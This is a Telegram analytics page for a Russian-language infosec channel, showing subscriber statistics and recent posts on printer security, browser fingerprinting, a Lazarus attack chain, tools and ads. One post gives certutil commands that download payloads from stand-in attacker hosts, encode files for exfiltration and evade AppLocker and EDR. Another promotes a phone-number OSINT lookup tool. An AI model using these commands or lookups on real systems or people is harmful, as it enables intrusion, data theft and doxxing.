fa
Feedback
CyberGuard

CyberGuard

کانال بسته

Полезные инструменты, репозитории статьи и новости из мира ИБ и Хакинга Ссылка для друга: https://t.me/+ToMfaM5mK4w0NzBi По рекламе: @data_owner

نمایش بیشتر
4 694
مشترکین
-424 ساعت
-197 روز
+230 روز
جذب مشترکین
سپتامبر '26
سپتامبر '26
+1
در 0 کانال‌ها
اوت '26
+101
در 49 کانال‌ها
Get PRO
ژوئیه '26
+121
در 17 کانال‌ها
Get PRO
ژوئن '26
+61
در 8 کانال‌ها
Get PRO
مه '26
+89
در 26 کانال‌ها
Get PRO
آوریل '26
+276
در 40 کانال‌ها
Get PRO
مارس '26
+222
در 84 کانال‌ها
Get PRO
فوریه '26
+22
در 6 کانال‌ها
Get PRO
ژانویه '26
+82
در 12 کانال‌ها
Get PRO
دسامبر '25
+97
در 44 کانال‌ها
Get PRO
نوامبر '25
+325
در 82 کانال‌ها
Get PRO
اکتبر '25
+26
در 15 کانال‌ها
Get PRO
سپتامبر '25
+19
در 0 کانال‌ها
Get PRO
اوت '25
+1 481
در 60 کانال‌ها
Get PRO
ژوئیه '25
+67
در 26 کانال‌ها
Get PRO
ژوئن '25
+148
در 21 کانال‌ها
Get PRO
مه '25
+9
در 1 کانال‌ها
Get PRO
آوریل '25
+412
در 21 کانال‌ها
Get PRO
مارس '25
+326
در 23 کانال‌ها
Get PRO
فوریه '25
+130
در 4 کانال‌ها
Get PRO
ژانویه '25
+125
در 2 کانال‌ها
Get PRO
دسامبر '24
+140
در 3 کانال‌ها
Get PRO
نوامبر '24
+340
در 4 کانال‌ها
Get PRO
اکتبر '24
+244
در 5 کانال‌ها
Get PRO
سپتامبر '24
+111
در 1 کانال‌ها
Get PRO
اوت '24
+116
در 2 کانال‌ها
Get PRO
ژوئیه '24
+222
در 8 کانال‌ها
Get PRO
ژوئن '24
+161
در 2 کانال‌ها
Get PRO
مه '24
+223
در 2 کانال‌ها
Get PRO
آوریل '24
+203
در 1 کانال‌ها
Get PRO
مارس '24
+210
در 3 کانال‌ها
Get PRO
فوریه '24
+256
در 2 کانال‌ها
Get PRO
ژانویه '24
+210
در 2 کانال‌ها
Get PRO
دسامبر '23
+162
در 2 کانال‌ها
Get PRO
نوامبر '23
+71
در 1 کانال‌ها
Get PRO
اکتبر '23
+125
در 1 کانال‌ها
Get PRO
سپتامبر '23
+90
در 0 کانال‌ها
Get PRO
اوت '23
+53
در 0 کانال‌ها
Get PRO
ژوئیه '23
+92
در 0 کانال‌ها
Get PRO
ژوئن '23
+107
در 0 کانال‌ها
Get PRO
مه '23
+76
در 0 کانال‌ها
Get PRO
آوریل '23
+58
در 0 کانال‌ها
Get PRO
مارس '23
+75
در 0 کانال‌ها
Get PRO
فوریه '23
+36
در 0 کانال‌ها
Get PRO
ژانویه '23
+249
در 0 کانال‌ها
تاریخ
رشد مشترکین
اشارات
کانال‌ها
01 سپتامبر+1
پست‌های کانال
🖨 Твой принтер - шпион. И он уже отправил твой паспорт в сеть Приветствую наших читателей! 👋 Думаешь, принтер — это просто
🖨 Твой принтер - шпион. И он уже отправил твой паспорт в сеть Приветствую наших читателей! 👋 Думаешь, принтер — это просто железка, которая печатает документы? Ха-ха, нет. Это полноценный компьютер с процессором, операционной системой, жёстким диском и веб-интерфейсом, который висит в твоей сети 24/7. И защищён он примерно как картонная коробка с надписью «не вскрывать». Пока ты печатаешь договоры, паспортные данные и налоговые декларации, твой принтер сохраняет их копии на своём диске. А ещё он открыт для любого, кто знает, как постучать в нужный порт. Разбираем, как хакеры читают твои документы через Wi-Fi и что с этим делать. Погнали! ⚡️ 🔍 Как хакеры заходят в твой принтер Современный принтер — это IoT-устройство с кучей сетевых сервисов. И почти все они дырявые:
🔴 Открытый порт 631 (IPP) — Internet Printing Protocol, который позволяет отправлять документы на печать по сети. Если он открыт для внешнего мира, злоумышленники могут перехватывать документы, выполнять код на принтере и даже использовать его для атак на другие устройства. 🔴 Веб-интерфейс без авторизации — в 2026 году обнаружили уязвимость CVE-2026-13753 в принтерах HP Deskjet 2800. Она позволяет получить доступ к API принтера без пароля и вытащить Wi-Fi Direct-пароли, SNMP-настройки и административные данные. Патча до сих пор нет. 🔴 Отозванные сертификаты — у принтеров EPSON нашли корневые сертификаты, которые уже давно отозваны. Это позволяет хакерам подделывать защищённое соединение и перехватывать всё, что принтер отправляет в сеть — документы, логины, пароли. 🔴 Дефолтные пароли — admin/admin, 123456, password. Производители до сих пор не перестали их ставить.
💀 Что могут сделать хакеры с твоим принтером 1. Украсть все твои документы — принтер хранит копии всего, что ты печатал или сканировал. Паспорта, договоры, медицинские карты — всё это лежит на его диске и ждёт, пока кто-то зайдёт и скопирует. 2. Перехватывать документы на лету — при печати по Wi-Fi данные летят по воздуху в открытом виде (если нет шифрования). Хакер может перехватить их прямо в момент отправки. 3. Внедриться в твою сеть — взломанный принтер становится плацдармом для атаки на компьютеры, NAS-хранилища и другие устройства. Через него можно запускать вредоносное ПО и перехватывать трафик всей сети. 4. Устроить хаос — хакеры могут заставить принтер печатать тонны мусора, выводить странные сообщения или просто заблокировать его, требуя выкуп. 🗣 Реальный кейс: дрон со смартфоном охотится за твоими документами Исследователи из Сингапура привязали смартфон к мультикоптеру, установили на него специальное ПО и запустили по офисным коридорам. Смартфон сканировал Wi-Fi-принтеры, подменял их точку доступа собой и перехватывал все документы, которые отправляли на печать. Жертвы даже не подозревали, что их «принтер» — это дрон за окном. Беспилотник легко поднимается на десятки этажей, и его никто не заметит. 🛡 Как защититься от «принтерного» шпионажа
1. Отключи Wi-Fi Direct, если не используешь — это одна из главных дыр. 2. Закрой порт 631 для внешнего мира — если не нужен IPP, отключи его. Если нужен — используй только с шифрованием (IPP over TLS). 3. Смени дефолтный пароль — admin/admin — это приглашение для хакеров. 4. Обновляй прошивку — патчи закрывают известные уязвимости. 5. Изолируй принтер в отдельной сети — чтобы даже взломанный принтер не мог добраться до твоих компьютеров. 6. Очищай память принтера — большинство моделей позволяют удалить историю печати. Делай это регулярно. 7. Проверь, открыт ли твой порт — команда для Windows: netstat -an | find ":631", для Linux/Mac: sudo netstat -tulnp | grep ":631".
🧬 Итог Твой принтер хранит твои секреты. И он не умеет их хранить. Паспорта, договоры, налоговые — всё это лежит на его диске в открытом доступе. Пока ты думаешь, что защищён, кто-то уже читает твои документы через Wi-Fi. Проверь свои настройки. Смени пароль. И запомни: принтер — это не просто железка. Это шпион в твоём доме. CyberGuardе || #Статья

2
CyberGuardе
CyberGuardе
238
3
Утро начинается не с кофе, а с GOFFEE. F6 изучила новые техники APT-группировки. Специалисты Лаборатории цифровой криминалист
Утро начинается не с кофе, а с GOFFEE. F6 изучила новые техники APT-группировки. Специалисты Лаборатории цифровой криминалистики и исследования вредоносного кода F6 исследовали атаку кибершпионов на одну из российских компаний. 🔴Как они работают — читайте в материале.
263
4
💻 Хочешь быть круче одноклассников? Научись защищать свой телефон Приветствую наших читателей! 👋 Думаешь, если ты в школе,
💻 Хочешь быть круче одноклассников? Научись защищать свой телефон Приветствую наших читателей! 👋 Думаешь, если ты в школе, за партой и под присмотром учителя — ты в безопасности? Ха-ха, нет. Твой школьный Wi-Fi, общий доступ к сети в библиотеке и даже подключение к домашнему роутеру — это открытые ворота для тех, кто знает, как зайти. 🎯 Кому этот курс: 🔴 Школьникам 12–17 лет — чтобы понимать, что происходит в твоём телефоне на самом деле. 🔴 Родителям — чтобы объяснить детям про безопасность простым языком. 🔴 Учителям и классным руководителям — чтобы закрыть тему «Цифровая гигиена» на уроках информатики. CyberGuardе|| #Курсы
312
5
🗝 КАК ПРЯТАТЬ СЕКРЕТЫ. Полный ГАЙД по хранению информации. 📹 Первоисточник CyberGuardе| Вакансии | Чат || #Видео
🗝 КАК ПРЯТАТЬ СЕКРЕТЫ. Полный ГАЙД по хранению информации. 📹 Первоисточник CyberGuardе| Вакансии | Чат || #Видео
353
6
🌐GeoVista — Агентная система визуального рассуждения с веб-расширением для точной геолокации GeoVista — это продвинутая сист
🌐GeoVista — Агентная система визуального рассуждения с веб-расширением для точной геолокации GeoVista — это продвинутая система на базе ИИ-агентов, предназначенная для определения географического местоположения по изображениям (геолокации) с использованием стратегий визуального рассуждения и внешнего поиска информации. Проект решает сложные задачи «визуального ориентирования», имитируя действия эксперта: агент анализирует детали на фото (архитектуру, дорожные знаки, ландшафт) и использует веб-поиск для проверки гипотез. 🐱 Ссылка на GitHub CyberGuardе |Вакансии | Чат ||#Репозитории
396
7
CyberGuardе
CyberGuardе
423
8
Вы когда-нибудь сталкивались с ситуацией, когда интернет-магазин не отправил товар и исчез с деньгами? Чаще всего мы думаем,
Вы когда-нибудь сталкивались с ситуацией, когда интернет-магазин не отправил товар и исчез с деньгами? Чаще всего мы думаем, что это единичный случай. Но реальность гораздо серьезнее. По данным экспертов F6, киберпреступники все чаще создают целые паутины фальшивых интернет-магазинов под разными юрлицами, доменами и реквизитами, но с единым центром управления. Признаки фиктивного магазина в такой сети: – разные юрлица для каждой точки; – разные домены и платежные реквизиты; – различный дизайн; – смена реквизитов при оплате. От блокировки одного магазина схема не рушится – сеть продолжит работать. Мошенники оперативно запускают новые ресурсы – у них всегда есть резервные домены и юрлица. Почему проверка одного мерчанта бесполезна и как работает F6 Fraud Protection – в нашем материале. Реклама. АО "БУДУЩЕЕ". ИНН 9709109340.
216
9
💀 Северокорейские хакеры используют квантовое шифрование и Zero-Day в Windows — и ты даже не заметишь Приветствую наших читателей! 👋 Думаешь, квантовые компьютеры — это что-то из далёкого будущего, о чём беспокоятся только физики в лабораториях? Ха-ха, нет. Северокорейская группировка Lazarus уже использует пост-квантовое шифрование в реальных атаках. Прямо сейчас. Против оборонных компаний Европы и Индии. Check Point Research обнаружила, что Lazarus внедрила алгоритм Kyber/ML-KEM — тот самый, который NIST стандартизировала в 2024 году для защиты от квантовых атак — в свою вредоносную цепочку. Вместе с Zero-Day уязвимостью в ядре Windows, которая даёт полный контроль над системой. Разбираем, как работает эта атака и почему она страшнее, чем ты думаешь. Погнали! ⚡️ 🔍 Что такое пост-квантовое шифрование и при чём здесь хакеры Kyber/ML-KEM — это алгоритм обмена ключами, устойчивый к взлому квантовым компьютером. Обычные алгоритмы типа RSA или ECC через 5–10 лет можно будет взломать за часы, когда квантовые машины станут достаточно мощными. А Kyber — нет. Lazarus использует этот алгоритм прямо сейчас, чтобы защитить свой командный канал от перехвата и расшифровки. Даже если спецслужбы перехватят трафик — они не смогут его прочитать. Ни сегодня, ни через десять лет. Атакующие опережают время. 💻 Цепочка атаки: от фальшивой вакансии до ядра Windows Всё начинается с Operation Dream Job — классической схемы Lazarus, где хакеры притворяются рекрутерами и рассылают фальшивые предложения о работе сотрудникам оборонных компаний. Жертвами стали организации, разрабатывающие системы наблюдения, дроны и робототехнику во Франции, Германии, Бразилии и Индии. Цепочка заражения выглядит так: 1. Фишинг — сотрудник получает «предложение работы» от имени известной компании. 2. Первый загрузчик MISTPEN — вредонос загружается в память и начинает общаться с командным сервером через OneDrive, используя Microsoft Graph API. 3. Сбор данных — MISTPEN собирает информацию о системе. 4. Запрос ключей — загрузчик запрашивает у сервера четыре публичных ключа. 5. Квантовое рукопожатие — используя Kyber/ML-KEM, вредонос генерирует сеансовый ключ и отправляет его на сервер. 6. Получение эксплойта — сервер отдаёт зашифрованный Zero-Day эксплойт. 7. Эскалация привилегий — эксплойт CVE-2026-68820 в драйвере AFD.sys (use-after-free race condition) повышает права до SYSTEM. 8. Установка руткита FudModule v3.1 — полный контроль над системой. 🛠 Что делает FudModule v3.1 Это не просто руткит. Это мясорубка для твоей защиты: 🔴 Отключает телеметрию и колбэки. 🔴 Удаляет минифильтры файловой системы. 🔴 Убивает NT Kernel Logger. 🔴 Ослепляет 94 провайдера Event Tracing for Windows (ETW). То есть твой EDR, SIEM и антивирус просто перестают видеть, что происходит в системе. А новая фишка версии 3.1 — взлом Smart App Control (защиты от запуска неподписанного кода). Руткит сбрасывает его политику и принудительно перезагружает механизм проверки целостности кода. Иными словами, система думает, что защищена. Но на самом деле она полностью открыта. Если хочешь ещё таких разборов — ставь огонь, идиот. И не забудь обновить Windows. 🔥 CyberGuardе || #Статья
376
10
💻 Ты не знаешь этих 3 лайфхаков Windows — а хакеры уже используют их против тебя Приветствую наших читателей! 👋 Думаешь, ты знаешь Windows вдоль и поперёк? Ха-ха, нет. Есть 3 скрытых функции, о которых молчат 90% админов — а злоумышленники используют их каждый день. И они уже встроены в твою систему. 1. Windows + V — твой тайный шпион Ты знал про Ctrl+V. Но Windows+V открывает историю буфера обмена — и там лежит всё, что ты копировал за последние часы: пароли, адреса, номера карт. 🛡 Что делать: Win+V → Очистить историю. Или отключи её в настройках → Система → Буфер обмена. 2. Win + . (точка) — скрытый доступ к эмодзи и символам Да, это просто панель эмодзи. Но хакеры используют её для вставки скрытых символов в фишинговые письма — они не видны глазу, но обманывают фильтры. 🛡 Что делать: будь внимателен к нестандартным символам в ссылках и файлах. 3. Ctrl + Shift + Esc — прямой доступ к диспетчеру задач Этот лайфхак знают все. Но мало кто знает, что Ctrl + Shift + Esc открывает диспетчер без лишних кликов — и это единственный способ заметить, что твой комп работает на кого-то ещё. 🛡 Что делать: проверяй вкладку «Автозагрузка» — если видишь незнакомые процессы, гугли их названия. 🧬 Итог Эти 3 лайфхака — не просто кнопки. Это твои глаза в системе. Закрой дыры, пока их не закрыли за тебя. Ставь огонь если пользуешься Windows. 🔥 CyberGuardе  || #Лайфхак
384
11
🕵️‍♂️ Один номер — и ты уже под колпаком: Wiwok сделает это за 5 секунд Приветствую наших читателей! 👋 Думаешь, чтобы пробить человека по номеру телефона, нужно платить за базы или регистрироваться в сомнительных сервисах? Ха-ха, нет. Wiwok делает это в терминале — бесплатно, без API-ключей и без регистрации. Вбиваешь номер в формате E.164 — и инструмент прогоняет его через 68 модулей: соцсети, форумы, базы утечек, публичные записи. Автоматически подхватывает найденные email'ы и юзернеймы и пробивает уже их. Всё — параллельно, за секунды. На выходе — HTML-отчёт с оценкой достоверности каждого найденного следа. 🔍 Что умеет Wiwok: 🔴 Ищет по номеру телефона, email, юзернейму или полному имени. 🔴 Не требует API-ключей — установил и запустил. 🔴 68 встроенных модулей — социальные сети, GitHub, академические базы, публичные записи. 🔴 Автоматически цепляется за найденные данные и пробивает их дальше. 🔴 Отмечает находки тегами HIGH / MEDIUM / LOW — сразу понятно, чему можно верить. 🔴 Выдаёт результат в JSON, TXT и красивом HTML-отчёте. 🛠 Как запустить за минуту: git clone https://github.com/kirozaku/wiwok cd wiwok python3 wiwok.py --setup python3 wiwok.py +71234567890 Готово. Через пару секунд ты видишь все профили, утечки и связи, которые есть в открытом доступе. А теперь, идиот, жми на 🔥, если хочешь больше таких разборов. CyberGuardе  || #Инструмент
420
12
Пока все спорят, какая нейросеть «самая лучшая»… кто-то уже просто берёт и использует то, что реально работает. В AIMarketCap
Пока все спорят, какая нейросеть «самая лучшая»… кто-то уже просто берёт и использует то, что реально работает. В AIMarketCap мы не кормим хайпом. Мы собираем рабочий арсенал: 🟣свежие инструменты без воды 🟣промпты, которые сразу дают результат 🟣связки сервисов под конкретные задачи 🟣честные сравнения, а не восторженные обзоры 🟣лайфхаки, которые экономят часы, а не просто «интересные» Здесь не про «будущее уже наступило». Здесь про то, как это будущее применять сегодня - в текстах, картинках, видео, аналитике и рутине. Если хотите меньше читать про ИИ и больше им пользоваться - заходите 👇 ➡️ https://t.me/+Ta3ORoyAZLI2NmYy Один клик. И вместо хаоса вкладок - понятная система.
411
13
🎧 AliExpress прослушивает твои наушники — и ты даже не заметишь Приветствую наших читателей! 👋 Думаешь, чтобы сайт тебя отс
🎧 AliExpress прослушивает твои наушники — и ты даже не заметишь Приветствую наших читателей! 👋 Думаешь, чтобы сайт тебя отслеживал, нужны куки или хотя бы регистрация? Ха-ха, нет. Достаточно открыть вкладку AliExpress — и твой собственный компьютер начнёт тихо «стучать» на хозяев. Буквально. Через наушники. И ты ничего не услышишь. В августе 2026 года разработчик случайно обнаружил, что сайт AliExpress запускает неслышимый звук и анализирует, как твоё устройство его обрабатывает. Всё это — чтобы создать уникальный цифровой отпечаток твоего железа. И обойти этот трекинг нельзя даже отключением звука. Погнали! ⚡️ 🔍 Как это работает: тишина, которая говорит Разработчик под ником m-c-tech заметил странность: его Bluetooth-наушники с поддержкой multipoint перестали переключаться между компьютером и телефоном. Стоило закрыть вкладку AliExpress — всё возвращалось в норму. Он залез в код и нашёл два сильно обфусцированных скрипта — collina.js и fireyejs.js, размещённые в инфраструктуре Alibaba. Эти скрипты: 🔴 Создавали два объекта AudioContext в браузере. 🔴 Генерировали пилообразный звуковой сигнал. 🔴 Пропускали его через узел GainNode с громкостью, установленной в ноль. 🔴 Подключали цепочку к системному аудиовыходу. Пользователь ничего не слышит. Но браузер продолжает обрабатывать звуковой поток, потому что цепочка остаётся активной. 💀 Что сайт узнаёт о твоём устройстве Каждый процессор, звуковая карта, операционная система и браузер обрабатывают один и тот же аудиосигнал с микроскопическими различиями. AliExpress измеряет эти вариации и добавляет их к общему «отпечатку» устройства. Но WebAudio — это лишь верхушка айсберга. Скрипты также собирают данные о: 🟢 Canvas и WebGL (как рендерится графика). 🟢 Разрешении экрана, CPU и памяти. 🟢 WebRTC и поддерживаемых форматах. 🟢 Таймингах браузера и движениях мыши. Всё это складывается в уникальный цифровой отпечаток, который позволяет сайту узнавать тебя при каждом визите — даже если ты чистишь куки, включаешь VPN или заходишь в режиме инкогнито. 🗣 «Но это же не прослушка!» Исследователи действительно подчёркивают: AliExpress не записывал разговоры и не включал микрофон. Сайт не слушает тебя — он сам создаёт сигнал внутри твоего компьютера и смотрит, как тот реагирует. Но это не делает ситуацию менее тревожной. Brave, которая публично заявила об этом методе, описывает его как использование аудиосистемы для трекинга. И это работает там, где обычные куки бессильны. Главная страница AliExpress незаметно создаёт два работающих WebAudio-графа и подключает их через zero-gain node к системному аудиоприёмнику. Отключить звук на вкладке нельзя — там нет обычного медиаэлемента для отключения. 🛡 Что делать прямо сейчас: 1. Закрывай вкладку AliExpress, когда не пользуешься сайтом. Это единственное, что гарантированно останавливает аудиопоток. 2. Используй Brave — браузер уже заявил, что защищает от подобного отслеживания. 3. Отключай Bluetooth-наушники от компьютера, если они не нужны — так ты хотя бы не заметишь эту активность. 4. Проверяй консоль разработчика (F12 → вкладка Network) — если видишь запросы к collina.js или fireyejs.js, знаешь, что тебя «слушают». CyberGuardе  |#Статья
436
14
Awesome Pentest Cheat Sheets Awesome Коллекция шпаргалок и контрольных списков, полезных для обеспечения безопасности и пентестирования.Список содержит огромный список тщательно отсортированных и отобранных ресурсов, что поможет вам сэкономить много времени. ➡️ Смотри тут CyberGuardе | Вакансии | Чат | #Репозиторий
500
15
👍 Вот оно и случилось... мы выпустили ролик на ютуб Вместе с каналом «CodeGuard» разобрали сетевую базу, без которой сложно
👍 Вот оно и случилось... мы выпустили ролик на ютуб Вместе с каналом «CodeGuard» разобрали сетевую базу, без которой сложно двигаться в ИБ. 📱 Смотреть ролик https://youtu.be/_zDkGX87Rms https://youtu.be/_zDkGX87Rms https://youtu.be/_zDkGX87Rms С любовью Карманный хакер | CodeGuard: PySec Edition
351
16
💡 Лайфхак: certutil — больше, чем просто управление сертификатами Приветствую наших читателей! 👋 Думаешь, certutil нужен только для работы с сертификатами? Ха-ха, нет. Это скрытый швейцарский нож Windows, который умеет скачивать файлы, декодировать base64, вычислять хеши и даже загружать полезную нагрузку в обход политик. При этом он — легитимный системный бинарник, подписанный Microsoft, и его редко блокируют. Погнали! ⚡️ 🛠 Что умеет certutil (и почему это круто): 1. Скачивание файлов без PowerShell (и без разрешения на скрипты) Когда PowerShell отключен или ограничен, certutil приходит на помощь: certutil -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\payload.exe -urlcache — скачивает файл по ссылке. -split — сохраняет как есть (без дополнительных метаданных). -f — принудительно перезаписывает, даже если файл уже есть. Готово. Файл на диске. Без Invoke-WebRequest, без System.Net.WebClient. И без логов PowerShell. 2. Декодирование base64 в исполняемый файл Если не хочешь светить скачивание, можно передать полезную нагрузку через командную строку в base64. На целевой машине certutil раскодирует её обратно: certutil -decode encoded.txt payload.exe Где encoded.txt — текст в base64. За секунды получаешь готовый .exe. Никаких запросов в сеть. 3. Кодирование файла в base64 для эксфильтрации Обратная задача — сжать файл в base64, чтобы вытащить его через текстовый канал: certutil -encode C:\secret\document.pdf encoded.txt Теперь зашифрованный текст можно скопировать в буфер и отправить через DNS-запросы или просто вставить в сообщение. 4. Вычисление хешей (MD5, SHA1, SHA256) для проверки целостности Установил эксплойт? Проверь, тот ли файл: certutil -hashfile payload.exe MD5 certutil -hashfile payload.exe SHA1 certutil -hashfile payload.exe SHA256 Полезно, чтобы убедиться, что файл не повреждён при передаче. 5. Обход ограничений AppLocker и WDAC certutil — подписан Microsoft и входит в белые списки по умолчанию. Многие политики безопасности разрешают его запуск, даже если они блокируют powershell.exe. Этим пользуются злоумышленники для загрузки и выполнения вредоносных компонентов. 🗣 Почему это удобно: ✔️ Легитимный бинарник — не вызывает подозрений у EDR. ✔️ Работает офлайн — не требует интернета для декодирования. ✔️ Всегда есть — встроен в Windows Server и десктопные версии. ✔️ Обходит политики — часто не блокируется, даже когда PowerShell и CMD ограничены. Пример цепочки: 1. certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe 2. certutil -hashfile beacon.exe SHA1 — проверяем хеш. 3. beacon.exe — запускаем. CyberGuardе| Вакансии | Чат | #Лайфхак
579
17
👩‍💻 Всем программистам посвящается! Вот 14 авторских обучающих IT каналов по самым востребованным областям программирования
👩‍💻 Всем программистам посвящается! Вот 14 авторских обучающих IT каналов по самым востребованным областям программирования: Выбирай своё направление: 👩‍💻 Python — t.me/python_ready 🤔 InfoSec & Хакинг — t.me/hacking_ready 🖥 SQL & Базы Данных — t.me/sql_ready 👩‍💻 IT Новости — t.me/it_ready 🤖 AI & ML — t.me/neuro_ready 👩‍💻 Frontend — t.me/frontend_ready 👩‍💻 C/C++ — https://t.me/cpp_ready 👩‍💻 C# & Unity — t.me/csharp_ready 👩‍💻 Linux — t.me/linux_ready 👩‍💻 Java — t.me/java_ready 📖 IT Книги — t.me/books_ready 📱 JavaScript — t.me/javascript_ready 🖼️ DevOps — t.me/devops_ready 🖥 Design — t.me/design_ready 📌 Гайды, шпаргалки, задачи, ресурсы и фишки для каждого языка программирования!
322
18
🔐 Полнофункциональная реализация I2P клиента на С++ I2P (Invisible Internet Protocol) является универсальным анонимным сетев
🔐 Полнофункциональная реализация I2P клиента на С++ I2P (Invisible Internet Protocol) является универсальным анонимным сетевым уровнем. Все коммуникации по I2P анонимны и защищены сквозным шифрованием, участники не раскрывают своих реальных IP адресов. 💠 Ссылка на F-Droid CyberGuardе| Вакансии | Чат | #Репозиторий
585
19
Слили в телеграмм тонны инфы и отсортировали по каналам ☁️ Хакинг & ИБ — 756GB 🤒 OSINT — 315GB 🖥 Курсы & GitHub — 1579GB ⌨️
Слили в телеграмм тонны инфы и отсортировали по каналам ☁️ Хакинг & ИБ — 756GB 🤒 OSINT — 315GB 🖥 Курсы & GitHub — 1579GB ⌨️ Python — 955GB 🙃 Linux & Bash — 459GB 😦 Работа в IT — 778GB 🖥 Общий архив — 2346GB ➡️ Практические инструкции, курсы, книги и инструменты.
225
20
💻 Viblo CTF Платформа от крупнейшего IT-сообщества Вьетнама. Отличная площадка с практическими задачами для прокачки в ИБ ➡️
💻 Viblo CTF Платформа от крупнейшего IT-сообщества Вьетнама. Отличная площадка с практическими задачами для прокачки в ИБ  ➡️ Ссылка  Hacking & InfoSec Base || #Ресурсы
566